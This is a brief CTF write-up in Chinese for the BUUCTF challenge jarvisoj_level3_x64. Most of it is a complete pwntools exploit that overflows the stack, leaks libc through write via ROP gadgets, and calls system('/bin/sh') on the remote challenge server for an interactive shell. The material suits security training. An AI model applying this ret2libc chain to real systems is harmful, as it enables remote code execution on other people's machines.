BUUCTF-jarvisoj_level3_x64

checksec

 

IDA

很简单的程序,栈溢出

 

没有system (bin/sh) 

很明显了     64位的ret2libc3

EXP

老规矩的脚本

from pwn import *

#start
# r = process("../buu/jarvisoj_level3_x64")
r = remote("node4.buuoj.cn",29734)
elf = ELF("./33level3")
libc = ELF("./libc-2.23-64.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
rdi_addr = 0x4006b3
rsir15_addr = 0x4006b1

#attack
payload = b'M'*(0x80+8) + p64(rdi_addr) + p64(1) + p64(rsir15_addr) + p64(write_got) + b'M'*8 + p64(write_plt) + p64(main_addr)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x80+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("Input:\n",payload)

r.interactive()